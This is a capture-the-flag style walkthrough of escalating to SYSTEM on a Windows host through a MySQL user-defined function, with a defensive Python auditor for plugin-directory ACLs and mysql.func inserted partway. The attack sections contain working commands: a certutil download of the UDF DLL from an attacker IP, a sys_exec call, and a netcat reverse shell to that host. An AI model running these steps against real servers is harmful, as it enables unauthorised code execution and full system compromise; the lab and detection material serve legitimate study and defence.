MySQL User Defined Functions


The target MySQL instance has been identified as running with SYSTEM privileges, and file read and write access through MySQL has been confirmed. Code execution, and with it privilege escalation, is therefore achievable via a User Defined Function (UDF) plugin.

Exploit


I found a repository that contains prebuilt UDF plugins for MySQL:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid/mysql_udf]
└─$ wget -q https://github.com/yanghaoi/lib_mysqludf_sys/releases/download/0.01/Release.zip ; unzip Release.zip 
Archive:  Release.zip
 extracting: Release-20220330.zip    
  inflating: Release-20220331.zip    
 extracting: Release-20211228.zip    
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid/mysql_udf]
└─$ unzip Release-20220330.zip    
Archive:  Release-20220330.zip
  inflating: lib_mysqludf_sys_x64.dll  

I extract the most recent release, which contains lib_mysqludf_sys_x64.dll.

Exploitation


show variables like '%plugin%';

First, I check the plugin directory; it is C:\wamp\bin\mysql\mysql5.7.31\lib\plugin\

PS C:\wamp\bin\mysql\mysql5.7.31\lib\plugin> icacls C:\wamp\bin\mysql\mysql5.7.31\lib\plugin
C:\wamp\bin\mysql\mysql5.7.31\lib\plugin Everyone:(OI)(CI)(F)
                                         Everyone:(I)(OI)(CI)(F)
                                         NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                         BUILTIN\Administrators:(I)(OI)(CI)(F)
                                         BUILTIN\Users:(I)(OI)(CI)(RX)
                                         BUILTIN\Users:(I)(CI)(AD)
                                         BUILTIN\Users:(I)(CI)(WD)
                                         CREATOR OWNER:(I)(OI)(CI)(IO)(F)
 
Successfully processed 1 files; Failed processing 0 files

Everyone has full control (F) of the plugin directory, so the current user is able to write to C:\wamp\bin\mysql\mysql5.7.31\lib\plugin

PS C:\wamp\bin\mysql\mysql5.7.31\lib\plugin> cmd /c certutil.exe -urlcache -split -f http://192.168.45.157/mysql_udf/lib_mysqludf_sys_x64.dll .\lib_mysqludf_sys_x64.dll
****  Online  ****
  000000  ...
  02f200
CertUtil: -URLCache command completed successfully.

I transfer the UDF plugin, lib_mysqludf_sys_x64.dll, into the plugin directory with certutil.

CREATE FUNCTION sys_exec RETURNS STRING SONAME "lib_mysqludf_sys_x64.dll";

Then I create the function sys_exec from the lib_mysqludf_sys_x64.dll plugin.
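Two things in this write-up are worth turning into a repeatable check on the defensive side: the icacls output above, where a broad principal holds write rights on plugin_dir, and the CREATE FUNCTION step, which registers the UDF in the mysql.func table. The script below is an added example (not part of the original write-up or of the lib_mysqludf_sys project); it parses icacls output for the plugin directory and flags write grants to low-privilege principals, and it checks rows from `SELECT name, dl FROM mysql.func` against a list of libraries the DBA actually deployed. The sample icacls text is constructed from the output shown above, and the sample mysql.func row is constructed to match the function registered here; the principal list and the write-token set are my own assumptions about what a baseline audit should treat as suspicious.

```python
from __future__ import annotations

import re

# icacls permission tokens that let a principal create or modify files in a
# directory. Inheritance markers (I, OI, CI, IO, NP) are deliberately absent.
WRITE_TOKENS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "GW", "GA", "D", "DC"}

# Principals that every local low-privilege account is a member of (assumption:
# extend this with site-specific groups as needed).
BROAD_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# One ACE line: "<principal>:(flag)(flag)...", e.g. "BUILTIN\Users:(I)(CI)(WD)"
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)\s*$")


def parse_icacls(output: str, path: str) -> list[tuple[str, set[str]]]:
    """Parse `icacls <path>` output into (principal, flag-set) pairs.

    icacls prefixes the first ACE with the queried path and indents the rest;
    the trailing 'Successfully processed ...' summary line is ignored.
    """
    aces: list[tuple[str, set[str]]] = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        flags: set[str] = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
            # Specific rights can be comma-separated inside one group, e.g. (R,W)
            flags.update(tok.strip() for tok in group.split(","))
        aces.append((m.group("principal"), flags))
    return aces


def writable_by_low_priv(aces: list[tuple[str, set[str]]]) -> list[tuple[str, list[str]]]:
    """Return ACEs that grant write or modify rights to a broad principal.

    DENY entries are skipped: resolving deny-versus-allow precedence needs the
    full ACE order, and this audit only looks for obvious over-grants.
    """
    findings = []
    for principal, flags in aces:
        if "DENY" in flags or principal.lower() not in BROAD_PRINCIPALS:
            continue
        rights = flags & WRITE_TOKENS
        if rights:
            findings.append((principal, sorted(rights)))
    return findings


def unexpected_udfs(func_rows: list[tuple[str, str]],
                    expected_libs: frozenset[str] = frozenset()) -> list[tuple[str, str]]:
    """Flag (name, dl) rows from mysql.func whose library was not deployed on purpose.

    Any UDF backed by a library the DBA did not ship is a strong indicator of
    the plugin-drop technique described in the write-up.
    """
    return [(name, dl) for name, dl in func_rows if dl.lower() not in expected_libs]


# Constructed sample: the icacls output from the write-up above.
SAMPLE_PATH = r"C:\wamp\bin\mysql\mysql5.7.31\lib\plugin"
SAMPLE_ICACLS = r"""C:\wamp\bin\mysql\mysql5.7.31\lib\plugin Everyone:(OI)(CI)(F)
                                         Everyone:(I)(OI)(CI)(F)
                                         NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                         BUILTIN\Administrators:(I)(OI)(CI)(F)
                                         BUILTIN\Users:(I)(OI)(CI)(RX)
                                         BUILTIN\Users:(I)(CI)(AD)
                                         BUILTIN\Users:(I)(CI)(WD)
                                         CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample: what `SELECT name, dl FROM mysql.func` returns after the
# CREATE FUNCTION step above.
SAMPLE_FUNC_ROWS = [("sys_exec", "lib_mysqludf_sys_x64.dll")]


def audit(icacls_output: str, plugin_dir: str, func_rows: list[tuple[str, str]],
          expected_libs: frozenset[str] = frozenset()) -> dict:
    """Run both checks and return the findings as a dict."""
    return {
        "writable_plugin_dir": writable_by_low_priv(parse_icacls(icacls_output, plugin_dir)),
        "unexpected_udfs": unexpected_udfs(func_rows, expected_libs),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_ICACLS, SAMPLE_PATH, SAMPLE_FUNC_ROWS).items():
        print(key, value)
```

On the sample data the ACL check reports the two Everyone full-control entries and the BUILTIN\Users AD and WD entries, which together are exactly what let the DLL be dropped; the RX entry for BUILTIN\Users is correctly left alone. The expected remediation is to have plugin_dir writable only by Administrators and SYSTEM, and to review mysql.func whenever a library shows up there that was not deployed through change control.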

SELECT sys_exec("whoami > C:\\tmp\\out.txt");
PS C:\tmp> cat C:\tmp\out.txt
nt authority\system

Code execution as NT AUTHORITY\SYSTEM is confirmed.

SELECT sys_exec("C:\\tmp\\nc64.exe 192.168.45.157 1234 -e powershell") 

Spawning a reverse shell.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.135.189] 51652
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\wamp\bin\mysql\mysql5.7.31\data> whoami
whoami
nt authority\system
PS C:\wamp\bin\mysql\mysql5.7.31\data> hostname
hostname
SQUID
PS C:\wamp\bin\mysql\mysql5.7.31\data> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.135.189
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.135.254

System-level compromise.